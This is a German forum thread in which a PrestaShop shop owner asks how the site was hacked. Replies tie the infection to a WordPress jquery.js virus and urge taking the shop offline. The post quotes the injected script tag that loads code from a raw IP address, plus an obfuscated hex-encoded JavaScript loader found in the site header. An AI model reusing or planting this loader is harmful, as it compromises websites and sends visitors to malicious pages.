Prestashop Hack <script src="http://134.249.116.78/jquery.js"></script>

[hceins]

Hallo zusammen,

bevor ich jetzt das Backup einspiele würde ich gerne wissen wie dieser Hack zustande kam. Wenn ich jetzt im Backend auf ein Produkt klicke werde ich immer noch nach wenigen Sekunden auf diese URL weitergeleitet und ein Whitescreen erscheint. <script src="http://134.249.116.78/jquery.js"></script>

 

Im Frontend würde mach auch eine Fake Telekomseite weitergeleitet und dieser Code stand im Header:

 

                        var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

 

ich habe den JS Ordner komplett durch ein Backup ersetzt das Problem bei den Produkten bleibt bestehen.

 

Ich kann aber in Fliezilla keine Änderungen an weiteren Dateien erkennen.

 

Kennt jemand diese Hack. Wie kann man Ihn verhindern.

 

Presta Version 1.6.1.5

 

Danke und Gruß

Edited January 23, 2017 by hceins (see edit history)

[Whiley]

Scheint sich um den Ende letzten Jahres häufig bei Wordpress aufgetretenen Virus zu handeln:

https://www.linkedin.com/pulse/caution-wordpress-virus-spreading-attacking-jqueryjs-palem

 

Bei den Beiträgen zum o.a. Link findest du Möglichkeiten zum Aufspüren.

 

Grüsse

Whiley

[eleazar]

Solange würde ich den betreffenden Shop mal aus eurem Portfolio rausnehmen und den Kunden informieren, damit er die Seite vom Netz nimmt.

Allein auf der Startseite kommt der oben zitierte jquery-Aufruf auf die ukrainische Seite 20 mal vor, und landet keineswegs immer auf einer blank page. Vorhin hatte ich mal ein Angebot für Online-Spiele.